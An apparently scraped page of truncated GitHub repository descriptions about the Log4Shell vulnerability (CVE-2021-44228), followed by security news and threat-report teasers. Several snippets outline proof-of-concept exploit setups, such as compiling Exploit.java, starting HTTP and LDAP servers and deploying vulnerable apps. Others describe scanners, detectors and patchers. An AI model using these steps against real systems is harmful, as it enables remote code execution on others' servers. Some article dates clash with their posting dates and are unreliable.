Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Adblock Filter List AppleScript Batchfile Bikeshed C C# C++ CSS Clojure CoffeeScript Crystal D Dart Dockerfile Elixir G-code Go Groovy HCL HTML Haskell Java JavaScript Jinja Jupyter Notebook Less Lua MDX Makefile Markdown Mustache Nginx Nim Nunjucks OCaml Objective-C OpenSCAD Others PHP PLpgSQL

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it A video showing the exp

[Free Training Workshop] Learn how to prevent, detect and mitigate container based threats using Calico Cloud

prevent-detect-and-mitigate-container-based-threats Using a recent real-world example, we'll illustrate how to prevent, detect and mitigate the risk of container-based threats using Calico Cloud The Spring Boot web application used in this workshop is vulnerable to Log4Shell (CVE-2021-44228) Learning Objectives This workshop will teach you how to use Calico Cloud to pro

In deze publieke repo informeert Insignit over CVE's

cve-informatie In deze publieke repo informeert Insignit over CVE's CVE-2021-44228 Apache Log4J + CVE-2021-45046 PrintNightMare

Log4j2-CVE-2021-44228 介绍 Log4J的漏洞复现 软件架构 软件架构说明 安装教程 git clone giteecom/demonbhao/log4j2-cve-2021-44228git 安装JDK180以下版本 安装maven,打包需要 使用说明 编写你的poc代码块 编译Exploitjava javac Exploitjava 形成Exploitclass 开启LDAP协议 4开启http服务器,用python简单开启,

java-slf4j-logging-example Log Level Just a clarification about the set of all possible levels, that are: ALL &lt; TRACE &lt; DEBUG &lt; INFO &lt; WARN &lt; ERROR &lt; FATAL &lt; OFF If the log level of system is INFO, then logs of the WARN, ERROR, FATAL, and OFF levels can be output normally Level Descript

A simple simulation of the infamous CVE-2021-44228 issue.

CVE-2021-44228 This repository represents a simplified simulation of infamous CVE-2021-44228 issue Aside from system properties and other dictionary structures lookups, Apache Log4j also implements JNDI lookup feature for various reasons The JNDI can obtain services from a number of service providers, such as LDAP, DNS, Java RMI registry, etc The JNDI itself is a simple and

Playground repo to try out Log4j related things

Learning-Log4j2 Background See githubcom/vorburger/Log4j_CVE-2021-44228 Providers &amp; Priorities $ /gradlew run Jan 14, 2022 6:30:52 PM chvorburgerlog4jApp main INFO: hello, world As we can see, this logged "hello, world" using JUL to the console (unless otherwise configured) It uses the (new) log4j-to-jul mo

LOG4SHELL-CVE-2021-44228-Validator About This tool allows you to verify whether a simple Java web app is vulnerable to CVE-2021-44228 for a user provided version of Java and of Log4J You can also [optionally] apply one of a view pre-defined mitigations The simulation lab spun up by log4shell_validatorpy uses docker-compose to simulate exploiting the log4j vulnerability and

sample-vulnerable-log4j-direct-app This repository is a sample repository that is vulnerable to CVE-2021-44228 Repro of vulnerability First, visit canarytokensorg/ and create a new Log4Shell token (that emails you when it gets triggered) Then run the following command in this repository, where the --args value is the ${jndi:} value that you got when creating the ca

A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228

log4j-vulnerable-app-cve-2021-44228-terraform A Terraform to deploy vulnerable app and a JNDIExploit to work with CVE-2021-44228 About Stack This terraform creates two instances on a VPC in AWS Cloud You just need to export your AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY One instance is JNDIExploit Second is a Vulnerable-App to log4j exploit Please replace your SSH-Public-Ke

sample-vulnerable-log4j-indirect-app This repository is a sample repository that is vulnerable to CVE-2021-44228 because it indirectly depends on a vulnerable version of log4j via its dependency on githubcom/sgtest/sample-vulnerable-log4j-direct-lib Repro of vulnerability First, visit canarytokensorg/ and create a new Log4Shell token (that emails you when it g

Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046

log4shelltools log4shelltools is a tool that allows you to run a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046 This is the code that runs log4shellalexbakkerme If you'd like to inspect the code or run an instance in your own environment, you've come to the right place

Log4jExploitDemo A log4j vulnerable app used in a log4j session as a demo and proof of concept for the recently discovered CVE-2021-44228 vulnerability Setup and exploitation Steps Compile Exploitjava and start http server cd Log4jExploitDemo/exploit javac Exploitjava start http server,python python3 -m httpserver or php,php -S 127001:8000 Start ldap server git

MIDF Internship

##Learn From Internship [Since 11 October 2022] CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell) – This issue happens on 6 December 2021 Window Command Prompt: • shutdown –s –t 5: It means that the computer will shut down after 5 seconds Ubuntu Terminal Learning (cowsay): • uname &

Docker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability)

Log4j Vulnerability - Proof-of-concept This repo has the docker and k8s YAMLs that are needed to recreate the log4j vulnerability (seel below) Follow this blog to understand how all of this is tied together Build Docker Images In case you need to customize the docker images cd &lt;Git-Repo&gt;/web-server make build push cd

log4shell CVE-2021-44228 - demo :) 1 Run log4shell vuln app podman run -p 8080:8080 quayio/apoczeka/log4shell-vuln:latest 2 Run "exploit server" podman run -p 1389:1389 -p 8888:8888 quayio/apoczeka/log4shell -i &lt;host_address&gt; -l 1389 -p 8888 &lt;host_address&gt; i

C parody of log4j

log4c C parody of the log4j RCE exploit (CVE-2021-44228) Logs stuff to console, also happens to run ${expressions} for convenience :) Build instructions (with MinGW Makefiles generator) Replace the generator with whatever you use mkdir build cd build cmake -G "MinGW Makefiles" cmake --build Dont actually use this

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it A video showing the exp

CVE-2021-44228(Apache Log4j Remote Code Execution) all log4j-core versions &gt;=20-beta9 and &lt;=2141 The version of 1x have other vulnerabilities, we recommend that you update the latest version Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228) Usage: download this project, compile the exploit code blob/master/src/main/java/Exploitjava, an

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Running the application Run it: docker run --name vulnerable-app --rm -p 8080:8080 ghcrio/christophetd/log4shell-vulnerable-app@

Simple demo for Anchore Enterprise, including with multiple CICD workflow examples.

2022-09-enterprise-demo Simple demo for Anchore Enterprise Includes workflow examples for Jenkins, CircleCI, Codefresh, Drone, and GitHub Partial list of conditions that can be tested with this image: xmrig cryptominer installed at /xmrig/xmrig simulated AWS access key in /aws_access simulated ssh private key in /ssh_key selection of commonly-blocked packages installed (

Log4j-IOCs 21 Dec 2021 21 Aralık 2021 669733213 1209249188 45176232125 17324941126 1641002219 1678675145 143110242174 6916346110 18522010160 1649022265 1501589554 202283499 17818247225 15594151182 1942255812 1101012934 632503966 89187177203 775521041 206189227177 89223120178 681838474 34725439 7420818630 4

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Running the application Run it: docker run --name vulnerable-app --rm -p 8080:8080 ghcrio/christophetd/log4shell-vulnerable-app

This demo repository is scanned by our lab jenkins pipeline

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it A video showing the exp

Detector for Log4Shell exploitation attempts

log4shell-detector Detector for Log4Shell exploitation attempts What it does and doesn't do It does: It checks local log files for indicators of exploitation attempts, even heavily obfuscated ones that string or regular expression based patterns wouldn't detect It doesn't find vulnerable applications It doesn't and can't verify if the exploitation att

An agent-based approach to mitigating log4shell

JndiLookupRemover A Java agent which mitigates CVE-2021-44228 (log4shell) by patching the JndiLookup class How to use Download the latest release and add it as a Java agent to your application using -javaagent:&lt;release jar path&gt; What it does JndiLookupRemover patches log4j so that JNDI lookups return the static string !!PREVENTED JNDI LOOKUP!! This prevents the

OpenCensus - A stats collection and distributed tracing framework ❗ The opencensus-contrib-log-correlation-log4j2 Java client library is part of the OpenCensus project CVE-2021-44228 and CVE-2021-45046 disclosed security vulnerabilities in the Apache Log4j 2 version 215 or below The recent version v0283 depends on Log4j 2111 A number of previous versions also

Exploits for sbomexe The commands needed to run the the fingerprint phase and the agent h2-console (CVE-2021-42392) fingerprint java -jar classfile-fingerprint/target/classfile-fingerprint-0131-SNAPSHOTjar jdk -o /sbjsonl java -jar classfile-fingerprint/target/classfile-fingerprint-0131-SNAPSHOTjar supply-chain -i /sb1jsonl -s ~/Desktop/chains/sbomexe-poc/h2-consol

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Running the application Run it: docker run --name vulnerable-app --rm -p 8080:8080 ghcrio/christophetd/log4shell-vulnerable-app

A python interface for the NVD API, not endorsed by NVD.

NVDInterface NVDInterface is a python library to simplify retrieving and interacting with data from the National Vulnerability Database (NVD) This project is currently in the early stages of development and will hopefully see changes soon, however is being made available early for others to use, test, and request changes on Install (venv) $ pip install nvdinterface

AWS Shell for FireSim

AWS FPGA Shell for FireSim This is a fork of aws-fpga used for FireSim More information about this repo can be found in the FireSim Changelog Below is the standard aws-fpga documentation from upstream Table of Contents Overview of AWS EC2 FPGA Development Kit Developer Support Development Flow Development environments FPGA Developer AMI FPGA Hardware Development Kit (HDK)

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it Proof-of-concept (POC) As a

log4jdockerfile

log4jpwn log4j rce test environment See: wwwlunasecio/docs/blog/log4j-zero-day/ This repository contains an intentionally vulnerable playground to play with CVE-2021-44228 (aka: log4shell) Experiments to trigger the vulnerability in various software products mentioned here can be found in the vuln-software/ directory examples using the included python poc build Ei

漏洞数据分析系统 系统实体关系 本系统包含以下主要实体及其关系: Vulnerability(漏洞) 属性:cve_id, published_date, description, CPEs, CWE, CVSS2 关系: AFFECT -&gt; Software AFFECT_VERSION -&gt; Version FIX -&gt; Software Software(组件) 属性:name, author, url 关系: HAS -&gt; Version REUSE -&gt;

Log4Shell Exploiter - Agent Plugin for Infection Monkey Introduction Log4Shell Exploiter is an Agent Plugin for Infection Monkey that exploits CVE-2021-44228 It affects the Apache Log4j,a Java logging framework The plugin will attempt to exploit the vulnerability in three service: Apache Solr Apache Tomcat Logstash For more information, see the Log4Shell Exploiter Plugin do

AIG Shield Up Cybersecurity Program The AIG Shield Up Cybersecurity Program is a virtual internship hosted on Forage 👉 Learn more and participate here From Simulation to Reality: Tackling Zero-Day Vulnerabilities and Ransomware Attacks Time Period: June 2024 Overview This repository contains insights and strategies I developed while participating in the AIG Cybersecurity Vi

OpenSCA is an open source software supply chain security solution that supports the detection of open source dependencies, vulnerabilities and license compliance with a widely noticed accuracy by the community.

Manage Open Source Risks via Open Source Solution English|中文 Introduction Detection Ability Download &amp; Deployment Use OpenSCA Parameters Report Formats Sample Scan &amp; Report via Docker Container Local Vulnerability Database The Format of the Vulnerability Database File Explanations of Vulnerability Database Fields Sample of Setting the Vulnerabi

sample-vulnerable-log4j-indirect-app This repository is a sample repository that is vulnerable to CVE-2021-44228 because it indirectly depends on a vulnerable version of log4j via its dependency on githubcom/sgtest/sample-vulnerable-log4j-direct-lib Repro of vulnerability First, visit canarytokensorg/ and create a new Log4Shell token (that emails you when it g

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Running the application Run it: docker run --name vulnerable-app -p 8080:8080 ghcrio/christophetd/log4shell-vulnerable-app

log4cats Project Goals log4cats attempts to make referentially transparent logging a reality These F algebras allow you to write code for logging knowing you won't be doing side-effects as it offers no way to do so We provide our own slf4j layer, or you can use any of the supported backends, or create your own Quick Start To use log4cats in an existing SBT project wit

minecraft-ctf Wprowadzenie Witamy w minecraft-ctf, wyjątkowym wyzwaniu CTF stworzonym specjalnie dla Was! Twoim zadaniem będzie zdobycie flagi, wykorzystując podatność Log4j oraz kilka innych narzędzi, a to wszystko co najlepsze, z użyciem gry, którą chyba każdy zna! Przygotuj się na fascynujące wyzwanie! Owocnego hackowania i udanej zabawy! Zasady CTF Uruchom

This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation.

Log4Shell This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation What is Log4Shell? The CVE-2021-44228 / Log4Shell vulnerability consists of injecting vulnerable software with a malicious payload, which will ask Log4J to obtain a value from a third-party source, with JNDI and through the LDAP protocol The imported data can be code, w

Sysdig Onprem Install Documentation The Sysdig Platform is a highly available application for securing and monitoring cloud-native infrastructures Table of Contents Oversight Services Now Offered for All Installs and Upgrades Supported Migration Paths Oversight Services Now Offered for All Installs and Upgrades Note As part of our continued focus on our customers, we are no

Log4shell Updater Documentation Table of Contents English What exactly does the tool do? Compatible iFinder versions How to apply the tool step-by-step: Deutsch Was genau macht das Tool? Kompatible iFinder-Versionen So wenden Sie das Tool Schritt für Schritt an: English In order to close vulnerabilities related to the log4shell problem (CVE-2021-44228) we prov

Java Software Security Course Work and Projects

CS-305 Java Software Security Course Work and Projects Alexandrea Teigeler 2022 #--------------------------------------------------------------------------------------------------------------# Briefly summarize your client, Artemis Financial, and their software requirements #--------------------------------------------------------------------------------------------------------

just a temp area for a few trials, please don't clone :)

This is the WORK-IN-PROGRESS repository for Mark59 - be aware it may NOT always be in a completely consistent state Mark59 Documention, Guides, Downloads and More Available at the wwwmark59com website Releases Release 60-beta-2 Refine Playwright Options for Scripting Scripting samples moved to mark59-scripting-samples, mark59-scripting-sample-dsl Cr

Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228

Log4j Updater With the inevitable need to update the famous Java framework called Log4j, numerous companies are needing to update Log4j on several computers at the same time, which takes time and cost, and that's where the Log4j Updater comes in log4jupdatersh is a simple bash script with the aim of automatically detecting the package manager to be used by the system and

Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script "log4j-detectpy" developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228 To do so, it sends a GET request using threads (higher performance) to each of th

my awesome star list

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents C C# C++ CSS CUE Clojure Dockerfile Go HCL HTML Haskell Java JavaScript Jinja Jsonnet Jupyter Notebook Just Lua MDX Makefile Markdown Mustache Open Policy Agent Others Python Riot Roff Ruby Rust SCSS Shell Smarty Starlark Svelte Swift TypeScript Vim Script Vue C appview-team/appview - Gain ins

Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228 introduction A Remote Code Execution vulnerability has been found related to the Java logging library Log4j CVE-2021-44228 This vulnerability has caused a stir in the global cyber community, since the Wannacry we have not seen such an impact the reason: Most apps written in Java are thought to be affected and vulnerable, parti

Log4jSherlock Version 1020211219 Overview Log4j Scanner coded in Powershell, so you can run it in windows! This tool scans for JAR, WAR, EAR, JPI, HPI that contain the effected JndiLookupclass even in nested files Scans nested files searches for the effected JNDI class pulls version and reports in CSV, JSON, and txt log reports error ie access issues to folders where

Web Security Experimental Spring Application for TIC4304

Content Management System MVC This is a simple Spring MVC 5x application project built with Maven, incorporating dependencies such Bootstrap, J2EE and Spring Security Module Originally built for an interview coding assignment even though the author did not eventually work for that company Full source code is released under GNU GPL v3 PS The project is misnamed CRMMVC, sho

Vulnerable Spring Boot 2 Java Web Application - CVE-2021-44228 - Log4Shell This Spring Boot Application contains a vulnerable log4j (Version 2141) log, that is exploitable with the CVE-2021-44228 git clone githubcom/gramou/vuln-log4j2git cd vuln-log4j2 sudo docker build -t vulnlog4j2

cve-2021-44228-log4j-test 테스트 1 LDAP 서버와 해킹 파일 다운로드 서버 11 Docker-compose 실행 docker-composeyml version: '2' services: dockerdj: image: openidentityplatform/opendj:latest container_name: ldap environment: ROOT_USER_DN: "cn=han" ROOT_PASSWORD: "han" BASE_DN: "dc=bumbing,dc=x

Third party message exporter made in golang

Message Format Slack { "applicatoin": "slack", "webhookUrl": "&lt;SLACK_WEBHOOK_URL&gt;", "scanType": "image_scan", "vulnerabilities": [ {"cve": "CVE-2021-44228", "severity": "Critical", "description": "Log4j vulnerability&

Fixes CVE-2021-44228 in log4j by patching JndiLookup class

log4j-vulnerability-patcher-agent This agent fixes critical vulnerability CVE-2021-44228 in log4j by patching JndiLookup class, as recommended here WARNING: this is not a substitute for proper upgrade to log4j 2150, where this vulnerability was fixed for good Use this agent IF, and ONLY IF, you can't upgrade log4j in your app Agent can run on JRE 8 and higher, in any

tests with HC Vault and NTC

Hashi Vault JS This module provides a set of functions to help JavaScript Developers working with HashiCorp Vault to authenticate and access API endpoints using JavaScript promises This package is NOT affected by the log4shell CVE-2021-44228 vulnerability! Requirements (MacOS/Windows) NodeJs Minimum: v16x Recommended: v18x npm Tested on: v92x HashiCorp Vault

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it Proof-of-concept (POC) As a

Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.

Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability with custom payloads Disclaimer I am not responsible for your actions, burp-suite freezing, target getting hacked, thermonuclear war, or the current economic crisis caused by you following these directions YOU are choosing to use this to

Minecraft Vagrantbox for Log4Shell demo

LastLog4J - Demo VM for Log4Shell This project is a semi-automated homelab for exploiting the Log4Shell (CVE-2021-44228) vulnerability in Minecraft This CTF style lab has a flag called ~/secretstxt The goal is to use the use the malicious LDAP server running on 1723015 to get Remote Code Execution within the game and read the contents of the file Background Back in Dec 2

Log4j2 LDAP 취약점 테스트 (CVE-2021-44228)

Log4j2 2141 LDAP 원격 코드 실행 취약점(CVE-2021-44228) 확인 🎈 Spring Boot 2x 환경에서 테스트 취약점 공지 nvdnistgov/vuln/detail/CVE-2021-44228 target-server pomxml : Log4j2 버전을 취약버전으로 낮춤 &lt;properties&gt; &lt;javaversion&gt;17&lt;/javaversion&gt; &lt;!-- 현재 설정된 Sp

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools) Fuzzing for HTTP POST Data parameters Fuzzing for JSON data parameters Supports DNS callback for vulnerability discovery and validation WAF Bypass

Codeql 学习笔记 Codeql 概述 Codeql 本质上就是写各种过滤条件和数据流跟踪,感觉像是在写面向对象的 SQL。建议先掌握面向对象的思想、一门面向对象的编程语言,以及 SQL 的编写。 Codeql 的工作原理主要是通过分析引擎来分析代码关系,生成一个代码数据库,然后可以用 QL 语言进行各种

Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec

log4shell-dockerlab Credits All credits goes to the original authors I just git-cloned and created a docker-compose file, that's all LunaSec - log4shell 0-day @christophetd - log4shell-vulnerable-app @mbechler - marshalsec @tangxiaofen7 - Exploitjava Description This repository contains a docker-compose setup which starts an attacker LDAP server and a victim web serve

Log4j Shell Poc This is a simple example only used to study the cause/behaviors/capabilities of CVE-2021-44228 vuln-pakgs Old versions of log4j packages that are needed to perform CVE-2021-44228 POC vuln-app Contains a vulnerable java app using Log4j and an attack shell script to test the concept of vulnerability

Little recap of the log4j2 remote code execution (CVE-2021-44228)

Little recap of the log4j2 remote code execution (CVE-2021-44228) Requirements maven &gt;= 3 java &gt;= 8 no running ldap on 127001:1389 Usage Build with maven mvn test The surefire plugin will be executed two times: ExploitabilityTest proofs the expolitability of the bug MitigationTest will be executed with the vm prop

we are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

Introduction we are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(log4shell) in their AWS account We currently support "CVE-2021-44228" and "CVE-2021-45046" RCE vulnerabilities The script enables security teams to identify external-facing AWS assets by running the exploit on them, a

My starred Repos

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ai algorithm analytics android angular ansible api archlinux arduino artificial-intelligence automation awesome awesome-list aws azure backend bash bootstrap bot c chatgpt chatgpt-api chrome chrome-extension cli clojure code compiler computer-science cpp csharp css cybersecurity dart data-analys

Recent Articles

Log4j Vulnerabilities: Attack Insights
Symantec Threat Intelligence Blog • Siddhesh Chandrayan • 23 Dec 2025

Symantec data shows variation and scope of attacks.

Posted: 23 Dec, 20214 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinLog4j Vulnerabilities: Attack InsightsSymantec data shows variation and scope of attacks.Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...

Apache Log4j Zero-Day Being Exploited in the Wild
Symantec Threat Intelligence Blog • Threat Hunter Team • 11 Dec 2025

Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability

Posted: 11 Dec, 20211 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinApache Log4j Zero-Day Being Exploited in the WildSymantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...

Budworm: Espionage Group Returns to Targeting U.S. Organizations
Symantec Threat Intelligence Blog • 13 Oct 2025

Posted: 13 Oct, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinBudworm: Espionage Group Returns to Targeting U.S. OrganizationsRecent attacks by group have spanned continents and include first confirmed attacks seen against the U.S. in a number of years.The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a mul...

Ransomware: How Attackers are Breaching Corporate Networks
Symantec Threat Intelligence Blog • Karthikeyan C Kasiviswanathan Vishal Kamble • 28 Apr 2025

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Posted: 28 Apr, 20228 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinRansomware: How Attackers are Breaching Corporate NetworksLatest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...

Stonefly: North Korea-linked Spying Operation Continues to Hit High-value Targets
Symantec Threat Intelligence Blog • Threat Hunter Team • 27 Apr 2025

Espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.

Posted: 27 Apr, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinStonefly: North Korea-linked Spying Operation Continues to Hit High-value TargetsEspionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.The North Korean-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...

The Threat Landscape in 2021
Symantec Threat Intelligence Blog • Threat Hunter Team • 19 Jan 2025

Symantec takes a look at the cyber security trends that shaped the year

Posted: 19 Jan, 20226 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinThe Threat Landscape in 2021Symantec takes a look at the cyber security trends that shaped the yearFrom the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021. A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at the some of the major thre...

IT threat evolution in Q3 2023. Non-mobile statistics
Securelist • AMR • 01 Dec 2023

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q3 2023: Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe. A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus components. Attempts to run malware for stealing money from online bank accounts were stopped on the com...

IT threat evolution in Q2 2023. Non-mobile statistics
Securelist • AMR • 30 Aug 2023

IT threat evolution in Q2 2023 IT threat evolution in Q2 2023. Non-mobile statistics IT threat evolution in Q2 2023. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q2 2023: Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe. A total of 209,716,810 unique links were detected by Web ...

IT threat evolution in Q1 2023. Non-mobile statistics
Securelist • AMR • 07 Jun 2023

IT threat evolution in Q1 2023 IT threat evolution in Q1 2023. Non-mobile statistics IT threat evolution in Q1 2023. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q1 2023: Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. Web Anti-Virus detected 246,912,694 unique URLs ...

IT threat evolution in Q3 2022. Non-mobile statistics
Securelist • AMR • 18 Nov 2022

IT threat evolution in Q3 2022 IT threat evolution in Q3 2022. Non-mobile statistics IT threat evolution in Q3 2022. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...

IT threat evolution in Q2 2022. Non-mobile statistics
Securelist • AMR • 15 Aug 2022

IT threat evolution in Q2 2022 IT threat evolution in Q2 2022. Non-mobile statistics IT threat evolution in Q2 2022. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q2 2022: Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe. Web Anti-Virus recognized 273,033,368 unique URLs as ma...

Four million outdated Log4j downloads were served from Apache Maven Central alone despite vuln publicity blitz
The Register • Gareth Corfield • 11 Jan 2022

Get our weekly newsletter It's not as though folks haven't been warned about this

There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks. Tracked as CVE-2021-44228 aka L...

You better have patched those Log4j holes or we'll see what a judge has to say – FTC
The Register • Thomas Claburn in San Francisco • 05 Jan 2022

Get our weekly newsletter Apply fixes responsibly in a timely manner or face the wrath of Lina Khan

The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...

Bad things come in threes: Apache reveals another Log4J bug
The Register • Simon Sharwood, APAC Editor • 19 Dec 2021

Get our weekly newsletter Third major fix in ten days is an infinite recursion flaw rated 7.5/10

The Apache Software Foundation (ASF) has revealed a third bug in its Log4 Java-based open-source logging library Log4j. CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j. That’s the third new version of the tool in the last ten days. In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remote code execution f...

CISA issues emergency directive to fix Log4j vulnerability
The Register • Thomas Claburn in San Francisco • 17 Dec 2021

Get our weekly newsletter Federal agencies have a week to get their systems patched

The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021. Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a wee...

As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others
The Register • Chris Williams, Editor in Chief • 15 Dec 2021

Get our weekly newsletter Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with security flaw along with world + dog Log4j doesn't just blow a hole in your servers, it's reopening that can of worms: Is Big Biz exploiting open source?

Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Successful...

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16
The Register • Gareth Corfield • 14 Dec 2021

Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed

Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...

Popular password manager LastPass to be spun out from LogMeIn
The Register • Jude Karabus • 14 Dec 2021

Get our weekly newsletter Private equity owners play pass the parcel

